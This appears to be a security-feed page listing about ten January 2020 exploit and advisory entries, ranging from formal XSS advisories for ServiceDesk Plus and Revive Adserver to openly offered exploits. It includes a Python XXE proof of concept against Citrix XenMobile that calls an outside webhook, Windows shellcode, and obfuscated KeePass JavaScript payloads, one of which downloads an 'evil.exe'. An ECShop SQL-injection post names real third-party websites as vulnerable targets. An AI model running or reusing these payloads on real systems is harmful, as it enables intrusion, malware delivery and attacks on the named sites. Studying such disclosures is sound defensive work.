ZOHO ManageEngine ServiceDeskPlus versions 11.0 Build 11007 and below suffer from a cross site scripting vulnerability.

MD5 | 12badb31b3d895bd0a427533aba4a756

SEC Consult Vulnerability Lab Security Advisory 
=======================================================================
title: Reflected XSS
product: ZOHO ManageEngine ServiceDeskPlus
vulnerable version: <= 11.0 Build 11007
fixed version: 11.0 Build 11010
CVE number: CVE-2020-6843
impact: medium
homepage: https://www.manageengine.com/products/service-desk/
found: 2019-12-01
by: Johannes Kruchem (Office Vienna)
SEC Consult Vulnerability Lab

An integrated part of SEC Consult
Europe | Asia | North America

https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"ServiceDesk Plus is a game changer in turning IT teams from daily fire-fighting
to delivering awesome customer service. It provides great visibility and central
control in dealing with IT issues to ensure that businesses suffer no downtime.
For 10 years and running, it has been delivering smiles to millions of IT folks,
end users, and stakeholders alike."

Source: https://www.manageengine.com/products/service-desk/



Business recommendation:
------------------------
The vendor published a patch for ServiceDesk Plus with service pack 11010.

It is recommended to install the patch with the included patcher. An in-depth
security analysis performed by security professionals is highly advised, as the
software may be affected from further security issues.


Vulnerability overview/description:
-----------------------------------
1) Reflected Cross-Site Scripting (CVE-2020-6843)
A parameter of the module called "geti18nkey" reflects unfiltered user input if
it is changed. The corresponding request is frequently sent in the background
if a pre-configured network scan was started.


Proof of concept:
-----------------
1) Reflected Cross-Site Scripting (CVE-2020-6843)
To reproduce the issue visit this URL authenticated as administrator:
http://$IP:8080/CustomReportHandler.do?module=geti18nkey&key=

How the parameter was found:
1) Authenticate as administrator and add an IP range in Admin -> Networkscan.
2) Click the "play" button next to the created IP range to start the scan.
3) To check the status of a started network scan frequent requests like
"http://$IP:8080/CustomReportHandler.do?module=geti18nkey&key=sdp.admin.network.listview.discoverystatus.scanned&sdpcsrfparam="
are sent to the server.
4) The value of the "key" parameter will be reflected if you change a single character.
The "sdpcsrfparam" isn't needed in order to trigger the XSS.
5) XSS can thus be exploited by calling
"http://$IP:8080/CustomReportHandler.do?module=geti18nkey&key="


Vulnerable / tested versions:
-----------------------------
The following versions have been tested which were the latest versions available at the
time of the test:
- 10.5
- 11.0 Build 11007


Vendor contact timeline:
------------------------
2019-12-05: Contacting vendor through ManageEngine Security Response Center (MESRC)
Uploaded security advisory to bugbounty.zoho.com
2019-12-09: Vendor promised to fix the vulnerability.
2020-01-08: Reported issue has been fixed in service pack 11010.
2020-01-22: Public release of security advisory.


Solution:
---------
The vendor provides an updated version which should be installed immediately.
https://www.manageengine.com/products/service-desk/download.html

The vendor also provided a link to their readme about the new release:
https://www.manageengine.com/products/service-desk/readme.html#11010


Workaround:
-----------
None


Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF Johannes Kruchem / @2020

Source

Employee Leaves Management System version 2.0 suffers from a cross site request forgery vulnerability.

MD5 | 2ae268dfb5b02477de0b12594fff1310

# Exploit Title: Employee Leaves Management System 2.0 Cross-Site Request
Forgery
# Date: 22-01-2020
# Author: Priyanka Samak
# Vendor Homepage: https://phpgurukul.com/
# Software Link:
https://phpgurukul.com/employee-leaves-management-system-elms/
# Software: Employee Leaves Management System
# Version : 2.0
# Tested on Windows 10
# Vulnerability Type: Cross-Site Request Forgery
#Cross-site Request Forgery is an attack whereby an attacker tricks a
victim into performing actions on their behalf.
#*1. Description*
#The vulnerability exists due to failure in the "/managedepartments.php"
script to properly verify the source of HTTP request.
#This Cross-Site Request Forgery (CSRF) allows an attacker to execute
arbitrary code by sending a malicious request to a logged-in user.
#*2. Proof of Concept:* This example sends HTTP GET crafted request in
order to delete the specified department.

<body



Source

Citrix XenMobile Server version 10.8 suffers from an XML external entity injection vulnerability.

MD5 | 98dfa95366d3218a5c4e705da6798a5c

# Exploit Title: Citrix XenMobile Server 10.8 - XML External Entity Injection
# Google Dork: inurl:zdm logon
# Date: 2019-11-28
# Exploit Author: Jonas Lejon
# Vendor Homepage: https://www.citrix.com
# Software Link:
# Version: XenMobile Server 10.8 before RP2 and 10.7 before RP3
# Tested on: XenMobile
# CVE : CVE-2018-10653

#!/usr/bin/python3
##
## PoC exploit test for the security vulnerability CVE-2018-10653 in
XenMobile Server 10.8 before RP2 and 10.7 before RP3
##
## This PoC was written by Jonas Lejon 2019-11-28
https://triop.se
## Reported to Citrix 2017-10, patch released 2018-05
##

import requests
import sys
from pprint import pprint
import uuid

# Surf to https://webhook.site and copy/paste the URL below. Used for
XXE callback
WEBHOOK = "https://webhook.site/310d8cd9-ebd3-xxx-xxxx-xxxxxx/"

id = str(uuid.uuid1())

xml = '''<?xml version="1.0" encoding="UTF-8"
standalone='no'?><!DOCTYPE plist [<!ENTITY % j00t9 SYSTEM "''' +
WEBHOOK + id + '''/test.dtd">%j00t9; ]>'''

print(id)

response = requests.put(sys.argv[1] + '/zdm/ios/mdm', verify=False,
headers=
{'User-Agent': 'MDM/1.0',
'Connection': 'close',
'Content-Type': 'application/x-apple-aspen-mdm'},
data=xml,stream=True
)
print(response.content)
print(response.text)
pprint(response)

Source

9 bytes small Microsoft Windows 7 screen locking shellcode.

MD5 | 342333e070d67e23f69ad3f94c730111

# Title: Windows/7 - Screen Lock Shellcode (9 bytes)
# Author: Saswat Nayak
# Date: 2020-01-22
# Shellcode length 9
# Tested on: Win 7 SP1-64

/*
***** Assembly code follows *****
xor eax,eax
xor ebx,ebx
xor ecx,ecx
mov eax,0x00000002
mov ebx,0x00020000
push ebx
push al
mov ecx,0x77661497
call ecx


*/

char code[]=

"x31xC0xB8x6Fx86x67x77xFFxD0";

int main(int argc, char **argv)
{
int (*func)();
func = (int (*)()) code;
(int)(*func)();
}

Source

KeePass version 2.44 suffers from a denial of service vulnerability.

MD5 | e3921df2f71a715fc3761f07b520768e

# Exploit Title : KeePass 2.44 - Denial of Service (PoC)
# Product : KeePass Password Safe
# Version : < 2.44
# Date: 2020-01-22
# Vendor Homepage: https://keepass.info/
# Exploit Author: Mustafa Emre Gül
# Website: https://emregul.com.tr/
# Tested On : Win10 x64
# Description : The free, open source, light-weight and easy-to-use password manager.


PoC:
Open KeePass > Help > About KeePass > Help (any local help area) >
Drag&Drop HTML File

Save the contents to html.


Payload-1:
(DoS & Run Cmd)


//<![CDATA[
<!--
var x="function f(x){var i,o="",l=x.length;for(i=l-1;i>=0;i--) {try{o+=x.c" +
"harAt(i);}catch(e){}}return o;}f(")\"function f(x,y){var i,o=\"\\\""+
"\\,l=x.length;for(i=0;i<l;i++){if(i==28)y+=i;y%=127;o+=String.fromCharCod" +
"e(x.charCodeAt(i)^(y++));}return o;}f(\"\\xr}jMDLW\\\\nRTN\\\\\"+
"\\\LFE\\\\004\\\\017\\\\022GD\\\\\\\\^\\\\rhGjYh" +
"83#9y2/(-s:\\\\021\\\\024\\\\013\\\\025Y9D\\\\037E\\\"+
"\034\\\\013F\\\\017\\\\002\\\\003\\\\037\\\\021\\"+
"\\005\\\\033\\\\021\\\\030\\\\020*UX\\\\032\\\\02" +
"5\\\\025\\\\010\\\\030\\\\020t<^!M@;?T+4W~Q`3}tfr4}bch4\\" +
"\\177jith\\\\\"\\|\\\\003g[TLTB[u\\\\010\\\\013OB@[U_" +
"F\\\\016h\\\\027\\\\033\\\\006d\\\\033\\\\004gNaP\" +
"\\\003\\\\\"\\.&:z\\\\0314\\\\033&u9(>$>;p=3=3 70=d\\\"+
"\006y\\\\n\\\\037\\\\r<\\\\022\\\\010\\\\022\\\" +
"\027J \\\\010\\\\004\\\\007\\\\r\\\\0177NS2\\\\035" +
",\\\\037.\\\\001(\\\\033VWX=\\\\023\\\\026\\\\\\\"+
"\\\\\016\\\\026l!\\\\\"\\_vYh'()Ynx-}g|1/3Wgsvl|Uyvx}k\\" +
"\\010}\\\\000tWFTNX]\\\\004xDHBCl\\\\023\\\\033\\\\02" +
"3\\\\024iDkV\\\\031\\\\032\\\\033\\\\177\\\\\\\\"+
"RS`2*/j\\\\0273)`\\\\025h\\\\027n\\\\021l,=5|6,0\\\\nu\"+
"\\\004{\\\\006yu}~\\\\003\\\\022=\\\\014CDE5\\\\002\"+
"\\\034I\\\\031\\\\003\\\\000MSO>\\\\036\\\\006\\\" +
"\033\\\\035\\\\033\\\\021WXYZ'\\\\016!\\\\020 !\\\\"+
"\"\\_vYh;'ziye}z1LcN}(:tx|`$GnAp#\\\\017IVNH\\\\033\\\\004\"+
"\\\016\\\\023\\\\031\\\\021\"\\,28)\"(f};)lo,0(rtsbus." +
"o nruter};)i(tArahc.x=+o{)--i;0=>i;1-l=i(rof}}{)e(hctac};l=+l;x=+x{yrt{)401" +
"=!)31/l(tAedoCrahc.x(elihw;lo=l,htgnel.x=lo,\"\"=o,i rav{)x(f noitcnuf""+
")" ;
while(x=eval(x));
//-->
//]]>


//<![CDATA[
<!--
var x="function f(x){var i,o="",ol=x.length,l=ol;while(x.charCodeAt(l/13)!" +
"=48){try{x+=x;l+=l;}catch(e){}}for(i=l-1;i>=0;i--){o+=x.charAt(i);}return o" +
".substr(0,ol);}f(")19,\"ZPdw771\\b77-0xjk-7=3771\\sp,cw$520\\:330\"+
"\xg030\\jj9%530\\b000\\XZUUVX620\\LP\\\\Pr\\610\\KOHD400\" +
"\620\\720\\\\\\WOWGPr\\530\\NClAauFkD,$gqutdr/3-ig~`|)rkanwbo2" +
"30\\t\\ 520\\&310\\$n\\200\\)230\\/000\\-K530\\310\\310" +
"\\n\\630\\010\\IULFW620\\600\\400\\700\\520\\=*100\\(70" +
"0\\4500\\*310\\-u}xy8pt~}|{771\\itg/e771\\sb|`V620\\530\\NT\" +
"\\\MdYjGh010\\@TVI[O410\\620\\n\\330\\ZB@CQA200\\SAijArGhEec" +
"J{HaN*2S?9t)V)5,&waedtbn\\!010\\'420\\%n\\+r\\U]XY030\\PT^]\\" +
"\\[ZY]GZEr\\CYQ@b~4|);/pw$:2'610\\?410\\=220\\vn720\\h520\\hz" +
"f7!%$4\"\\730\\L\\\\JOfWdEjN420\\230\\230\\IU710\\@BE_IG]" +
"AHyV771\\430\\300\\|kntnxixnv|:`kwe2S3h|r~)|wowgp>o\\\\410\\!B7" +
"30\\330\\430\\020\\K030\\)600\\/L530\\530\\330\\600\\QN" +
"C400\\500\\r\\320\\710\\720\\320\\M620\\710\\500\\2+>3?" +
"\"(f};o nruter};))++y(^)i(tAedoCrahc.x(edoCrahCmorf.gnirtS=+o;721=%y{)++i" +
";l<i;0=i(rof;htgnel.x=l,\"\"=o,i rav{)y,x(f noitcnuf")" ;
while(x=eval(x));
//-->
//]]>




Payload-2:
(run iexplorer.exe & download infected file)



function exec(cmdline, params) {
var fso = new ActiveXObject("Scripting.FileSystemObject");
fileExist = fso.FileExists(cmdline);
if (!fileExist) {
alert("The requested application is not installed.");
}
else {
var shell = new ActiveXObject( "WScript.Shell" );
if (params) {
params = ' ' + params;
}
else {
params = '';
}
shell.Run('"' + cmdline + '"' + params);
}
}

<a href="javascript:exec('C:\Program Files\Internet
Explorer\iexplore.exe', '-nomerge
http://ipaddress/evil.exe');">Edition Mode Active

Source

ECTouch ECShop version 2.7.3 suffers from a remote SQL injection vulnerability.

MD5 | 0ba14f6875fb0a9daeddafb224ed1358

###################################################################

# Exploit Title : ECTouch ECShop v2.7.3 SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 22/01/2020
# Vendor Homepage : ecshop.com - ectouch.cn
# Software Download Link : ecshop.com/download
# Software Affected Versions : 1.0 and 2.7.3
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:/mobile/index.php?m=default site:cn
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

###################################################################

# Impact :
***********
ECTouch ECShop v2.7.3 is prone to an SQL-injection vulnerability because
it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or
modify data, or exploit latent vulnerabilities in the underlying database.
A remote attacker can send a specially crafted request to the vulnerable application and
execute arbitrary SQL commands in application`s database. Further exploitation of this
vulnerability may result in unauthorized data manipulation.
An attacker can exploit this issue using a browser or with any SQL Injector Tool.

###################################################################

# Administrator Panel Login Path :
******************************
/mobile/user.php?act=login

# Vulnerable SQL Injection Parameters :
*************************************
&id=
&brand=
&price_min=
&price_max=
&filter_attr=
&page=

# SQL Injection Exploit :
**********************
/mobile/index.php?m=default&c=category&a=asynclist&id=[SQL Injection]

/mobile/index.php?m=default&c=category&a=asynclist&id=[ID-NUMBER]&brand=[SQL Injection]

/mobile/index.php?m=default&c=category&a=asynclist&id=[ID-NUMBER]&brand=[ID-NUMBER]&price_min=[SQL Injection]

/mobile/index.php?m=default&c=category&a=asynclist&id=[ID-NUMBER]&brand=[ID-NUMBER]&price_min=[ID-NUMBER]&price_max=[SQL Injection]

/mobile/index.php?m=default&c=category&a=asynclist&id=[ID-NUMBER]&brand=[ID-NUMBER]&price_min=[ID-NUMBER]&price_max=[ID-NUMBER]&filter_attr=[SQL Injection]

/mobile/index.php?m=default&c=category&a=asynclist&id=[ID-NUMBER]&brand=[ID-NUMBER]&price_min=[ID-NUMBER]&price_max=[ID-NUMBER]&filter_attr=[ID-NUMBER]&page=[SQL Injection]&sort=sales_volume&order=ASC

###################################################################

# Example Vulnerable Sites :
*************************
[+] zhijianshi.cn/mobile/index.php?m=default&c=category&a=asynclist&id=1153&brand=0&price_min=0&price_max=0&filter_attr=1%27

[+] as66.cn/mobile/index.php?m=default&c=category&a=asynclist&id=1153&brand=0&price_min=0&price_max=0&filter_attr=1%27

[+] xingsom.net/shop/mobile/index.php?m=default&c=category&a=asynclist&id=1153&brand=0&price_min=0&price_max=0&filter_attr=1%27

[+] daqiunici.com/mobile/index.php?m=default&c=category&a=asynclist&id=1153&brand=0&price_min=0&price_max=0&filter_attr=1%27

[+] 95isee.com/mobile/index.php?m=default&c=category&a=asynclist&id=1153&brand=0&price_min=0&price_max=0&filter_attr=1%27

[+] ctsports.com.cn/mobile/index.php?m=default&c=category&a=asynclist&id=1153&brand=0&price_min=0&price_max=0&filter_attr=1%27

[+] guojiseka.cn/mobile/index.php?m=default&c=category&a=asynclist&id=1153&brand=0&price_min=0&price_max=0&filter_attr=1%27

[+] xiuyoupu.com/mobile/index.php?m=default&c=category&a=asynclist&id=1153&brand=0&price_min=0&price_max=0&filter_attr=1%27

[+] rebeccafashion.cn/mobile/index.php?m=default&c=category&a=asynclist&id=1153&brand=0&price_min=0&price_max=0&filter_attr=1%27

[+] xienson.cn/mobile/index.php?m=default&c=category&a=asynclist&id=69&brand=0&price_min=0&price_max=0&filter_attr=0&page=1%27&sort=sales_volume&order=ASC

###################################################################

# Example SQL Database Error :
****************************
MySQL Query Error
Warning: Division by zero in C:webWWWxiuyoupumobileinclude
appsdefaultcontrollerCategoryController.class.php on line 100
SQL: SELECT g.goods_id, g.goods_name, g.goods_name_style, g.market_price,
g.is_new, g.is_best, g.is_hot,g.brand_id, g.shop_price AS org_price, g.seller_credit,
g.best_rating,g.cat_id,g.admin_user_id,g.store_card6,g.store_card7,g.store_card8,
g.grade,g.enter_time,g.kejara,g.trademark_type,g.grade,g.mail_type,g.cash_deposit,
IFNULL(mp.user_price, g.shop_price) AS shop_price, g.promote_price, g.goods_type,
g.promote_start_date, g.promote_end_date, g.goods_brief, g.goods_thumb , g.goods_img,
xl.sales_volume FROM ecs_goods AS g LEFT JOIN ecs_touch_goods AS xl ON
g.goods_id=xl.goods_id LEFT JOIN ecs_member_price AS mp ON mp.goods_id =
g.goods_id AND mp.user_rank = '0' WHERE g.is_on_sale = 1 AND g.is_alone_sale =
1 AND g.goods_number0 AND g.is_delete = 0 AND (g.cat_id IN ('1153')
OR g.goods_id IN ('') ) ORDER BY goods_id DESC LIMIT -0 ,
You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use near '-0 ,' at line 1

###################################################################

# Discovered By Hacker KingSkrupellos from Cyberizm.Org Digital Security Team

###################################################################

Source

This application, known as the SolarWinds n-Central Dumpster Diver, utilizes the nCentral agent dot net libraries to simulate the agent registration and pull the agent/appliance configuration settings. This information can contain plain text active directory domain credentials. This was reported to SolarWinds PSIRT(psirt@solarwinds.com) on 10/10/2019. In most cases the agent download URL is not secured allowing anyone without authorization and known customer id to download the agent software. Once you have a customer id you can self register and pull the config. Application will test availability of customer id via agent download URL. If successful it will then pull the config. We do not attempt to just pull the config because timing out on the operation takes to long. Removing the initial check, could produce more results as the agent download could be being blocked where as agent communication would not be. Harmony is only used to block the nCentral libraries from saving and creating a config directory that is not needed.

MD5 | 327907230e1957acb4b9383e511c3db6

Source

Revive Adserver versions 5.0.3 and below suffer from a cross site scripting vulnerability.

MD5 | 876b5c6e7b14f9d76a23e57cfee6a8f9

========================================================================
Revive Adserver Security Advisory REVIVE-SA-2020-001
------------------------------------------------------------------------
https://www.revive-adserver.com/security/revive-sa-2020-001
------------------------------------------------------------------------
CVE-IDs: t.b.a.
Date: 2020-01-21
Risk Level: Low
Applications affected: Revive Adserver
Versions affected: <= 5.0.3
Versions not affected: >= 5.0.4
Website: https://www.revive-adserver.com/
========================================================================


========================================================================
Vulnerability - Reflected XSS
========================================================================
Vulnerability Type: Improper Neutralization of Input During Web Page
Generation ('Cross-site Scripting') [CWE-79]
CVE-ID: t.b.a.
CVSS Base Score: 4.3
CVSSv3.1 Vector: AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N
CVSS Impact Subscore: 1.4
CVSS Exploitability Subscore: 2.8
========================================================================

Description
-----------
A reflected XSS vulnerability has been discovered in the publicly
accessible afr.php delivery script of Revive Adserver by Jacopo Tediosi.
There are currently no known exploits: the session identifier cannot
be accessed as it is stored in an http-only cookie as of v3.2.2. On
older versions, however, under specific circumstances, it could be
possible to steal the session identifier and gain access to the admin
interface.

Details
-------
The query string sent to the www/delivery/afr.php script was printed
back without proper escaping in a JavaScript context, allowing an
attacker to execute arbitrary JS code on the browser of the victim.


References
----------
https://hackerone.com/reports/775693
https://github.com/revive-adserver/revive-adserver/commit/327aaf10
https://github.com/revive-adserver/revive-adserver/commit/9ec2fa26
https://cwe.mitre.org/data/definitions/79.html



========================================================================
Solution
========================================================================

We strongly advise people to upgrade to the most recent 5.0.4 version of
Revive Adserver.


========================================================================
Contact Information
========================================================================

The security contact for Revive Adserver can be reached at:
.

Please review https://www.revive-adserver.com/security/ before doing so.


--
Matteo Beccati
On behalf of the Revive Adserver Team
https://www.revive-adserver.com/


Source

Park Ticketing Management System version 1.0 suffers from a persistent cross site scripting vulnerability.

MD5 | 1e843f25a9ae3b474d06c5f3b5494406

# Exploit Title: Park Ticketing Management System 1.0 Stored Cross-Site Scripting Vulnerability
# Date: 2020-01-21
# Exploit Author: Priyanka Samak
# Vendor Homepage: https://phpgurukul.com/

# Software Link: https://phpgurukul.com/park-ticketing-management-system-using-php-and-mysql/

# Software: Park Ticketing Management System
# Version : 1.0
# Vulnerability Type: Cross-site Scripting
# Vulnerability: Stored XSS
# Tested on Windows 10
# This application is vulnerable to Stored XSS vulnerability. This
# Vulnerable script: http://localhost/ptms/normal-search.php
# Vulnerable parameter: ‘search ticket’ Input Field

# Payload used: alert(123)
# POC: http://localhost/ptms/normal-search.php in this
# URL you can add the specially crafted Ticket number.
# Click on the search and you will see your Javascript code executes.


Thanks and Regards,

Priyanka Samak

Source